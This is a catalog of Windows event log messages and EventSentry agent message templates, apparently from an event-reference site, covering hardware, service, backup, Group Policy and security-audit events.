Networking driver on 'VMCOMPUTERNAME' loaded but has a different version from the server. Server version 3.2 Client version 0.2 (Virtual machine ID 041A17DA-19CF-4667-9253-48DBA40CB726). The device will work, but this is an unsupported configuration. This means that technical support will not be provided until this problem is resolved. To fix this problem, upgrade the integration services. To upgrade, connect to the virtual machine and select Insert Integration Services Setup Disk from the Action menu.
Message:
AEN: APORT_TIMEOUT_DETECTED (port=0)
Source:
service control manager
Message:
The Debug Diagnostic service entered the running state
Category:
Exchange VSS Writer
Message:
Exchange VSS Writer (instance 6c1b73a7-5922-480e-a8ef-f89e3b34780a:20) has unsuccessfully completed the backup of storage group 'First Storage Group'. No log files have been truncated for this storage group.
Source:
Microsoft-Windows-Backup
Source:
Microsoft-Windows-Eventlog
Message:
The security log is now full.
Source:
Microsoft-Windows-Eventlog
Message:
Event log automatic backup
Log: Security
File: C:\Windows\System32\Winevt\Logs\Archive-Security-2010-11-05-11-20-26-007.evtx
Message:
The configuration information of the performance library "C:\WINDOWS\system32\perfts.dll" for the "TermService" service does not match the trusted performance library information stored in the registry. The functions in this library will not be treated as trusted.
Message:
Hanging application Customer.exe, version 6.0.16.0, hang module hungapp, version 0.0.0.0, hang address 0x00000000.
Source:
service control manager
Message:
The Distributed Transaction Coordinator service terminated with service-specific error 3221229584 (0xC0001010).
Message:
Windows cannot determine the associated site for this computer. (The RPC server is too busy to complete this operation. ). Group Policy processing aborted.
Source:
application error
Message:
Faulting application Ppcl.exe, version 8.1.660.0, faulting module ntdll.dll, version 5.2.3790.4455, fault address 0x0002860e.
Source:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has lost redundancy. Restore power or replace any failed or missing power supplies.
Chassis: '0'
[SNMP TRAP: 6032 in CPQHLTH.MIB]
Detected by application: Server Agents
Source:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system is in a failed state. Restore power or replace the failed power supply.
Chassis: '0'; Bay: '2'
[SNMP TRAP: 6050 in CPQHLTH.MIB]
Detected by application: Server Agents
Category:
Printer Management
Message:
Client printer auto-creation failed. The driver could not be installed. Possible reasons for the failure: The driver is not in the list of drivers on the server. The driver cannot be located. Driver mapping is incorrect. Client name: (WI_0NZOY79v2OfWLkfXH) Printer: (FBC-HR-3700 on ps_1 (from WI_0NZOY79v2OfWLkfXH) in session 4) Client Printer driver: (HP COLOR LASERJET 3700 PCL 6) Server Printer driver: (HP Color LaserJet 3700 PCL 6)
Message:
Access failure: Critical error on disk XXXXXXX (Port: SATA 2.0).
Message:
Error message from one of the disks failing on an onboard nVidia nForce4 RAID controller.
Message:
Error message from one of the disks failing on an onboard nVidia nForce4 RAID controller.
Message:
The MAD Monitoring thread was unable to read the state of the services, error '0x80010108'.
For more information, click http://www.microsoft.com/contentredirect.asp.
Source:
Service Control Manager
Message:
________________________________________
EVENT # 170686
EVENT LOG System
EVENT TYPE Error
SOURCE Service Control Manager
EVENT ID 7034
COMPUTERNAME HDQ121
DATE / TIME 3/8/2011 3:29:02 PM
MESSAGE The McAfee Engine Service service terminated unexpectedly. It has done this 2 time(s).
________________________________________
Find out more about the event at http://www.myeventlog.com.
Message:
The description for Event ID ( 256 ) in Source ( NSTSEC ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details. The following information is part of the event: [**NST**][PID:864;TID:960][CNSTCSPHelper is initializing!][FUNC=NSTSECProxy::NSTSECProxy::CNSTCSPHelper::Initialize][FILE=.\NSTCSPClient.cpp:LINE=36]
Source:
MSExchange ActiveSync
Message:
The setting ExternalProxy in the Web.Config file was not valid. The previous value was null and has been changed to .
Message:
The server {8C53F4F9-90F5-4CA0-A8FE-76ECF5FBD2CF} did not register with DCOM within the required timeout.
Message:
The configuration of the AdminConnection\TCP protocol in the SQL instance BLACKBERRY is not valid.
Message:
Volume Shadow Copy Service error: Failed resolving account ACCOUNTNAME with status 1376. Check connection to domain controller and VssAccessControl registry key.
Operation:
Gather writers' status
Executing Asynchronous Operation
Context:
Current State: GatherWriterStatus
Error-specific details:
Error: NetLocalGroupGetMemebers(ACCOUNTNAME), 0x80070560, The specified local group does not exist.
Message:
This computer must be configured as a domain controller. To prevent this computer from shutting down in the future, run Setup on the disk that you used to install the operating system to configure the computer as a domain controller.
Message:
A provider, TPVCGProv, has been registered in the WMI namespace, Root\ThinPrint, but did not specify the HostingModel property. This provider will be run using the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests. Ensure that provider has been reviewed for security behavior and update the HostingModel property of the provider registration to an account with the least privileges possible for the required functionality.
Message:
NTBackup error: 'The operation failed. Consult the Backup Report for more details.'
Source:
Microsoft-Windows-RPC-Events
Message:
Possible Memory Leak. Application ("C:\Windows\system32\mmc.exe" "C:\Windows\system32\dhcpmgmt.msc" ) (PID: 6320) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({6BFFD098-A112-3610-9833-46C3F874532D}), Method number (2). User Action: Contact your application vendor for an updated version of the application.
Source:
Microsoft-Windows-WindowsUpdateClient
Category:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for SQL Server 2008 R2 (KB2494088).
Message:
Logon Failure:
Reason: Unknown user name or bad password
User Name: FIRST LAST
Domain: USER-PC
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name: USER-PC
Caller User Name: -
Caller Domain: -
Caller Logon ID: -
Caller Process ID: -
Transited Services: -
Source Network Address: 0.0.0.0
Source Port: 0
Source:
Microsoft-SharePoint Products-SharePoint Foundation Search
Message:
The mount operation for the gatherer application 00000000-0000-0000-0000-000000000000 has failed because the schema version of the search administration database is less than the minimum backwards compatibility schema version supported for this gatherer application. The database might not have been upgraded.
Message:
The Dynamic Memory driver failed because dynamic memory is not supported on this release of Windows.
Message:
HP NC7781 Gigabit Server Adapter: The network link is down. Check to make sure the network cable is properly connected.
Message:
Information Store
2140
12
Message:
The SSL server credential's certificate does not have a private key information property attached to it. This most often occurs when a certificate is backed up incorrectly and then later restored. This message can also indicate a certificate enrollment failure.
Source:
Microsoft-Windows-Security-Auditing
Category:
Other Policy Change Events
Message:
One or more errors occured while processing security policy in the group policy objects.
Error Code: 87
GPO List:
{F0DF8E32-7E0A-4B67-1234-9BD831BFE64C} Windows Audit & Event Log Settings
{AAC1786C-016F-11D2-9012-00C04fB984F9} Default Domain Controllers Policy
{91B2F340-016D-11D2-1234-00C04FB984F9} Default Domain Policy
Message:
The system time was changed.
Process ID: 1296
Process Name: C:\WINDOWS\system32\EVENTSENTRY\eventsentry_svc.exe
Primary User Name: WEBSERVER$
Primary Domain: MYDOMAIN
Primary Logon ID: (0x0,0x3E7)
Client User Name: WEBSERVER$
Client Domain: MYDOMAIN
Client Logon ID: (0x0,0x3E7)
Previous Time: 8:57:01 PM 8/31/2011
New Time: 8:57:06 PM 8/31/2011
Source:
Microsoft-Windows-CAPI2
Message:
Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
Source:
Microsoft-Windows-Resource-Exhaustion-Detector
Category:
Resource Exhaustion Diagnosis Events
Message:
Windows successfully diagnosed a low virtual memory condition. The following programs consumed the most virtual memory: SomeProcess.exe (848) consumed 372129792 bytes, Procmon64.exe (3616) consumed 209563648 bytes, and devenv.exe (6364) consumed 201162752 bytes.
Message:
Server is listening on [ 'any' <ipv4> 1433]
Message:
System Security Access Granted:
Access Granted: SeBatchLogonRight
Account Modified: DOMAINA\username
Assigned By:
User Name: SERVERNAME$
Domain: DOMAINA
Logon ID: (0x0,0x3E7)
Source:
Server Administrator
Category:
Storage Service
Message:
Controller log file entry: Physical Disk 1:0:4 Controller 0, Connector 1
Source:
Server Administrator
Category:
Storage Service
Message:
Unexpected sense. SCSI sense data: Sense key: 3 Sense code: 11 Sense qualifier: 0: Physical Disk 1:0:4 Controller 0, Connector 1
Message:
Windows cannot perform filter check for Group Policy object CN={<GUID>}CN=PoliciesCN=SystemDC=DOMAINDC=local. Group Policy processing aborted.
Message:
The power sub-system is no longer redundant.
Message:
A power supply has failed. (Power Supply 1)
User Action
Check the failed power supply and replace if necessary.
WBEM Indication Properties
AlertingElementFormat: 2 0x2 (CIMObjectPath)
Message:
Power redundancy has been lost. (Power Redundancy Set 1)
User Action
Check the power supply configuration and check the status of the power redundancy. Ensure the system is being powered adequately. Add or replace power supplies if necessary.
WBEM Indication Properties
AlertingElementFormat: 2 0x2 (CIMObjectPath)
Message:
The backup was not successful. The error is: There is not enough space on this drive to save the backup. Free up space by deleting older backups and unnecessary data or change your backup settings. (0x81000005).
Source:
Server Administrator
Category:
Storage Service
Message:
The RAID controller firmware and driver validation was not performed. The configuration file is out of date or corrupted. C:\Program Files (x86)\Dell\SysMgt\sm\cfg\: Controller 0 (SAS 6/iR Integrated)
Message:
The following fatal alert was received: 46
Message:
System Information Agent: Health: Fault Tolerant Power Supply Removed. A hot-plug fault tolerant power supply has been removed from the system.
Chassis: '0'; Bay: '2'
[SNMP TRAP: 6034 in CPQHLTH.MIB]
Message:
The attempt to power off [Computer Name] failed
Source:
Service Control Manager
Message:
The start type of the Windows Modules Installer service was changed from auto start to demand start.
Message:
ERROR: permission denied for relation SomeTable STATEMENT: select COLUMN1 from SomeTable where COLUMN2=5
Source:
Microsoft-Windows-Security-Auditing
Category:
MPSSVC Rule-Level Policy Change
Message:
Windows Firewall ignored a rule because its major version number is not recognized.
Profile: All
Ignored Rule:
ID: clr_optimization_v4.0.30319_32-1
Name: -
Category:
Service Monitoring
Message:
A driver was added:
Name: mraid35x (Mraid35x)
Status: Stopped
Startup type: Automatic
Executable: \SystemRoot\system32\drivers\mraid35x.sys
Message:
The ODBC driver for action "24hour" in the EventSentry Agent has been automatically adjusted to use "SQL Server Native Client 10.0", which is the latest version installed on this system. Dynamically added connection options: MARS_Connection=yes.
Message:
The description for Event ID ( 105 ) in Source ( hpdiags ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details.
Source:
EventSentry Network Services
Message:
A SNMP trap was received:
Version: 1
Community: public
Trap Sender: vmware1.domain.local (192.168.12.55)
Trap ID: vmware.vmwProductSpecific.vmwESX.vmkLoaded (1.3.6.1.4.1.6876.4.1.6.1)
Trap Bindings:
1: vmware.vmwTraps.vmwVmID (1.3.6.1.4.1.6876.50.101) = 1
2: vmware.vmwTraps.vmwVmConfigFilePath (1.3.6.1.4.1.6876.50.102) = /vmfs/volumes/474c55f6-89ccc558-5555-001143ebb975/TestServerF/TestServerF.vmx
3: vmware.vmwVirtMachines.vmwVmTable.vmwVmEntry.vmwVmDisplayName.1 (1.3.6.1.4.1.6876.2.1.1.2.1) = TEST07-W2K3-DE
Source:
EventSentry Network Services
Message:
A SNMP trap was received:
Version: 3
Username: public
Trap Sender: ups41.domain.local (192.168.16.117)
Trap ID: apc (1.3.6.1.4.1.318.0.10)
Engine ID: 0x800000000300C0B74DD7A6
Security Level: Authentication and Privacy
Trap Bindings:
1: apc.apcmgmt.mtrapargs.mtrapargsString (1.3.6.1.4.1.318.2.3.3.0) = UPS: Passed a self-test.
Source:
EventSentry Network Services
Message:
syslog@vmserver5.domain.local[daemon.warning]: Server Administrator: Storage Service EventID: 2264 A device is missing.: Battery 0 Controller 0
Message:
Unable to log events to security log:
Status code: 0xc0000008
Value of CrashOnAuditFail: 0
Number of failed audits: 103
Category:
Performance Monitoring
Message:
The EventSentry agent is experiencing an unusually high handle count (5001 handles) and/or high memory usage (48324564 bytes), which is most likely due to a known issue in Windows Server 2003 SP2 (http://support.microsoft.com/kb/938135). It is highly recommended that you navigate to http://support.microsoft.com/kb/938135 to download and install the hotfix to resolve this issue. It is not recommended that you continue to run the agent for an extended time period without installing the Microsoft hotfix.
Failure to install the hotfix may eventually result in system instability or a system crash. Installation of the hotfix will require a reboot.
Message:
GetSessionValue Failed to Open session value return error 2
Source:
Microsoft-Windows-Service Pack Installer
Message:
There is not enough free disk space to install the Service Pack. Required=4834 MB.
Source:
MSExchange CmdletLogs
Message:
Cmdlet suceeded. Cmdlet New-Mailbox, parameters {Name=Johnny Test User, UserPrincipalName=johnnytest@domain.local, ResetPasswordOnNextLogon=False, FirstName=Johnny, Initials=, Password=System.Security.SecureString, LastName=Test, Alias=johnnytest, SamAccountName=johnnytest}.
Source:
Microsoft-Windows-Servicing
Message:
Windows Servicing failed to complete the process of setting package KB967723 (Security Update) into Installed(Installed) state
Message:
The configuration for the agent (service) could not be re-read because the "Log File Monitoring" feature/function is busy and preventing an on-line configuration update. You can try to save the configuration again at a later time, or restart the EventSentry service to force a configuration update.
Source:
Microsoft-Windows-Hyper-V-Worker-Admin
Message:
'VM-SRV-001' started successfully. (Virtual machine ID D8EB8812-63FE-468A-9545-1E2028EC1F5F)
Source:
Microsoft Windows security
Category:
System Integrity
Message:
Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error.
File Name: \Device\HarddiskVolume3\Windows\System32\sysfer.dll
Source:
User profile service
Message:
Log Name: Application
Source: Microsoft-Windows-User Profiles Service
Date: 5/12/2012 4:13:40 PM
Event ID: 1530
Task Category: None
Level: Warning
Keywords:
User: SYSTEM
Computer: NONEOFYOURBIZ2
Description:
Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards.
DETAIL -
9 user registry handles leaked from \Registry\User\S-1-5-21-664570727-300873648-2978798648-1000:
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\My
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\CA
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\Disallowed
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\Windows\CurrentVersion\Explorer
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-User Profiles Service" Guid="{89B1E9F0-5AFF-44A6-9B44-0A07A7CE5845}" />
<EventID>1530</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2012-05-12T20:13:40.907441900Z" />
<EventRecordID>30031</EventRecordID>
<Correlation />
<Execution ProcessID="416" ThreadID="4684" />
<Channel>Application</Channel>
<Computer>NONEOFYOURBIZ2</Computer>
<Security UserID="S-1-5-18" />
</System>
<EventData Name="EVENT_HIVE_LEAK">
<Data Name="Detail">9 user registry handles leaked from \Registry\User\S-1-5-21-664570727-300873648-2978798648-1000:
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\My
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\CA
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\Disallowed
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\Windows\CurrentVersion\Explorer
</Data>
</EventData>
</Event>
Source:
Microsoft-Windows-GroupPolicy
Message:
The processing of Group Policy failed. Windows could not evaluate the Windows Management Instrumentation (WMI) filter for the Group Policy object cn={D3610029-DDDD-4141-AAAA-FDFFFFCCBB22},cn=policies,cn=system,DC=yourdomain,DC=local. This could be caused by RSOP being disabled or Windows Management Instrumentation (WMI) service being disabled, stopped, or other WMI errors. Make sure the WMI service is started and the startup type is set to automatic. New Group Policy objects or settings will not process until this event has been resolved.
Source:
Service Control Manager
Message:
The EventSentry service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
Message:
The server was unable to allocate from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations.
Source:
Microsoft-Windows-Security-Auditing
Message:
An account was logged off.
Subject:
Security ID: Domain\ad2user
Account Name: ad1user
Account Domain: Domain
Logon ID: 0xbb55b23
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
Source:
Microsoft-Windows-CertificateServicesClient-AutoEnrollment
Message:
Certificate for %1 with Thumbprint %2 is about to expire or has already expired.
Message:
System shutdown due to graphics card overheating.
Message:
The driver detected a controller error on \Device\Harddisk1\%.
Source:
Service Control Manager
Message:
The VNC Server Version 4 service terminated unexpectedly. It has done this 1 time(s)
Message:
An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WORKSTATION123$
Account Domain: CORPDOMAIN
Logon ID: 0x3e7
Logon Type: 7
New Logon:
Security ID: CORPDOMAIN\john.doe
Account Name: john.doe
Account Domain: CORPDOMAIN
Logon ID: 0xf3e668
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x314
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Workstation Name: WORKSTATION123
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
Message:
A new process has been created.
Subject:
Security ID: CORPDOMAIN\jack.doe
Account Name: jack.doe
Account Domain: CORPDOMAIN
Logon ID: 0xc2b4c
Process Information:
New Process ID: 0xcec0
New Process Name: C:\Windows\System32\PING.EXE
Token Elevation Type: TokenElevationTypeLimited (2)
Creator Process ID: 0x116c
Message:
Intel(R) 82574L Gigabit Network Connection
Network link is disconnected.
Source:
Service Control Manager
Message:
The Creative Audio Service service failed to start due to the following error:
The system cannot find the file specified.
Message:
The driver \Driver\WUDFRd failed to load for the device WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_GENERIC-&PROD_COMPACT_FLASH&REV_1.01#7&1C4905A4&0&058F63646476&1#.
Source:
Windows Media Player Network Sharing Service
Message:
Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x80004005'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.
Category:
Other Logon/Logoff Events
Message:
The workstation was locked.
Subject:
Security ID: GOTHAM\bat.man
Account Name: bat.man
Account Domain: GOTHAM
Logon ID: 0x19a2e6
Session ID: 1
Category:
Other Logon/Logoff Events
Message:
The workstation was unlocked.
Subject:
Security ID: GOTHAM\bat.man
Account Name: bat.man
Account Domain: GOTHAM
Logon ID: 0x19a2e6
Session ID: 1
Category:
User Account Management
Message:
A user account was locked out.
Subject:
Security ID: SYSTEM
Account Name: CORPDC1$
Account Domain: CORPDOMAIN
Logon ID: 0x3e7
Account That Was Locked Out:
Security ID: S-1-5-21-1179352123-210183264333-1239653321-8754
Account Name: beth.jackson
Additional Information:
Caller Computer Name: CORPDC1
Message:
EventSentry is caching more than 1024 files in the monitored directory C:\Web. To keep the resource consumption of the EventSentry agent low it is recommended that you move old files to a sub directory or another directory.
Source:
Microsoft-Windows-Security-Auditing
Message:
A handle to an object was requested.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: COMPUTER$
Account Domain: DOMAIN
Logon ID: 0x3E7
Object:
Object Server: Security
Object Type: File
Object Name: C:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.9200.16384_none_8325ae6a331660a6\GdiPlus.dll
Handle ID: 0x0
Resource Attributes: -
Process Information:
Process ID: 0x354
Process Name: C:\Windows\System32\svchost.exe
Access Request Information:
Transaction ID: {00000000-0000-0000-0000-000000000000}
Accesses: READ_CONTROL
SYNCHRONIZE
ReadData (or ListDirectory)
ReadEA
ReadAttributes
WriteAttributes
Access Reasons: READ_CONTROL: Granted by D:(A;;0x1200a9;;;BA)
SYNCHRONIZE: Granted by D:(A;;0x1200a9;;;BA)
ReadData (or ListDirectory): Granted by D:(A;;0x1200a9;;;BA)
ReadEA: Granted by D:(A;;0x1200a9;;;BA)
ReadAttributes: Granted by ACE on parent folder D:(A;;0x1200a9;;;BA)
WriteAttributes: Not granted
Access Mask: 0x120189
Privileges Used for Access Check: -
Restricted SID Count: 0
Message:
Action "%1" was unable to create a TCP connection with host "%2" due to error: %3
Message:
Action "%1" was unable to create a UDP socket to connect to host "%2" due to error: %3
Message:
EventSentry was unable to connect to the ODBC target %1 due to error "%2". EventSentry will cache data and forward it to the ODBC target once the database has become available again.
Message:
Action "%1" was unable to send a message to host "%2" due to error: %3
Message:
Action "%1" triggered process "%2", which ran for %3 seconds with the result shown below. Return code was %4.
%5
Message:
The process action "%1" was unable to execute process "%2" due to error "%3".
Message:
Process %1 (triggered by action "%2") exceeded the maximum allowed time interval of %3 minute(s) and EventSentry was unable to terminate the process due to the following error:
%4
Message:
Process %1 (triggered by action "%2") exceeded the maximum allowed time interval of %3 minute(s) and the process was terminated. Please increase the timeout interval for this process in the management application (System Health -> Application Scheduler).
Message:
Action "%1" triggered process "%2" successfully.
Message:
Action "%1" was unable to send trap to SNMP host "%2" due to error: %3
Message:
Action "%1" was unable to connect to SNPP host "%2" due to error: %3
Message:
Action "%1" was unable to send a message to pager ID "%2" due to error: %3
Message:
Action "%1" was unable to send the message due to error: %2
Message:
Unable to connect to the SCM (service control manager) due to error %1 (%2). The action "%3" failed to execute.
Message:
Unable to open the requested service (%1) due to error %2 (%3). The action "%4" failed to execute.
Message:
Unable to send the requested control to service %1, most likely due to error %2 (%3). The action "%4" failed to execute.
Message:
The checksum for executable file "%1" changed from the original checksum "%2". Only the EventSentry agent should have access to this file. This change indicates a potential security breach, and the process will not be launched. The contents of the file should be verified; restarting the EventSentry will re-create the file.
Message:
The service %1 could not be restarted because the it could not be stopped in the first place. The notification "%2" failed to execute.
Message:
The requested service control was successfully sent to service %1, however the current service status is still %2. Please monitor the status of the %1 service to ensure it is in the desired state.
Message:
The process "%1" was terminated successfully.
Instances Terminated: %2.
Affected Process Identifiers (PIDs): %3
Message:
The process "%1" could not be terminated due to error "%2".
Message:
Action "%1" was unable to initiate a system shutdown/reboot due to error: %3
Message:
Action "%1" was unable to connect to Jabber host "%2" due to error: %3
Message:
Action "%1" was unable to send a message to chat room "%2" due to error: %3
Message:
Action "%1" was unable to submit an event to "%2" due to error "%3".
Message:
Action "%1" was successfully submitted event with number %3 to "%2".
Message:
The EventSentry agent is ready.
Version: %1
Codepage: %2
The following packages are assigned:
Event Log Packages:
-------------------
%3
Log File Packages:
-------------------
%4
System Health Packages:
-----------------------
%5
Compliance Tracking Packages:
-----------------------------
%6
Message:
The EventSentry agent is stopping
Message:
EventSentry has successfully re-opened a handle to the "%1" event log after it has become invalid due to error "%2".
Message:
Unable to allocate memory (for %1) in routine %2
Message:
The agent was unable to find the local hostname (%1, %2) in the configuration, mostly due to a license problem. Make sure that only as many full hosts are configured in the EventSentry groups as licenses are installed. Note that Heartbeat-Only hosts which have the "Monitor Agent" option set count towards full host licenses.
Message:
4/18/2013 9:42:41 AM
While processing a TGS request for the target server krbtgt/DOMAIN.LOCAL, the account DESKTOP04$@DOMAIN.LOCAL did not have a suitable key for generating a Kerberos ticket (the missing key has an ID of 8). The requested etypes were 18. The accounts available etypes were 23 -133 -128 3 1.
Category:
Service Monitoring
Message:
The status for the service trustedinstaller(Windows Modules Installer) changed from Running to Stopped.
Addtional Information:
Startup Type: manual
Executable: C:\Windows\servicing
TrustedInstaller.exe
Service account: LocalSystem
Source:
Microsoft-Windows-FailoverClustering
Message:
Cluster Shared Volume 'Volume2' ('ClusterStorage Volume 2') is no longer available on this node because of 'STATUS_CLUSTER_CSV_AUTO_PAUSE_ERROR(c0130021)'. All I/O will temporarily be queued until a path to the volume is reestablished.
Category:
LDAP Operations
Message:
LDAP Bind was unsuccessful on directory OLDDC.domain.local for distinguished name ''. Directory returned error:[0x51] Server Down.
For more information, click http://www.microsoft.com/contentredirect.asp.
Source:
MSExchange SACL Watcher
Message:
SACL Watcher servicelet found that the SeSecurityPrivilege privilege is removed from account MYDOMAIN\Exchange Servers.
Message:
The IO operation at logical block address fd90027 for Disk 3 was retried.
Category:
Performance Monitoring
Message:
The performance counter "Performance System\Average Disk Queue Length" (PhysicalDisk(*)\Avg. Disk Queue Length) could not be monitored. Please make sure that the performance counter exists. If you are running a non-english version then you might have to adapt the name of the performance counter so it matches the language of the Operating System.
Message:
The ES Network Services log file is full.
Source:
Server Administrator
Category:
Storage Service
Message:
The controller debug log file has been exported.: Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Category:
Storage Service
Message:
The controller write policy has been changed to Write Through.
Category:
102 (no category messagefile registered)
Message:
Error code 0000009c, parameter1 00000000, parameter2 bab3c050, parameter3 b6514000, parameter4 00000145.
Source:
Microsoft-Windows-GroupPolicy
Message:
The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.
Source:
Microsoft-Windows-TaskScheduler/Operational
Category:
Task Start Failed
Message:
Task Scheduler failed to start "\Some Important Task" task for user "MYDOMAIN\EventMonitor". Additional Data: Error Value: 2147942402.
Source:
Microsoft-Windows-Hyper-V-Worker
Message:
Device 'Microsoft Synthetic Display Controller' in 'SERVER01' is loaded but has a different version from the server. Server version 3.0 Client version 3.2 (Virtual machine ID 8D6415C4-6E44-78FC-6BB8-34CCA67ACF48). The device will work, but this is an unsupported configuration. This means that technical support will not be provided until this problem is resolved. To fix this problem, upgrade the integration services. To upgrade, connect to the virtual machine and select Insert Integration Services Setup Disk from the Action menu.
Message:
The DNS server has encountered numerous run-time events. To determine the initial cause of these run-time events, examine the DNS server event log entries that precede this event. To prevent the DNS server from filling the event log too quickly, subsequent events with Event IDs higher than 3000 will be suppressed until events are no longer being generated at a high rate.
Category:
print processor
Message:
4aCreateFile(C:\WINDOWS\System32\spool\PRINTERS\00176.spl) succeeded
Message:
The winlogon notification subscriber <Profiles> took nnn second(s) to handle the notification event (Logon).
Source:
Office SharePoint Server
Category:
Office Server Shared Services
Message:
Application Server Administration job failed for service instance Microsoft.Office.Server.Search.Administration.SearchServiceInstance (dbb94537-db22-448b-92c9-d1f684a4a13e).
Reason: Could not find file 'C:\WINDOWS\system32\drivers\etc\HOSTS'.
Techinal Support Details:
System.IO.FileNotFoundException: Could not find file 'C:\WINDOWS\system32\drivers\etc\HOSTS'.
File name: 'C:\WINDOWS\system32\drivers\etc\HOSTS'
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)
at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)
at System.IO.FileInfo.OpenText()
at Microsoft.Search.Administration.Security.HOSTSFile.ParseHOSTSFile(Hashtable& HOSTSFileMappings, StringBuilder& HOSTSComments)
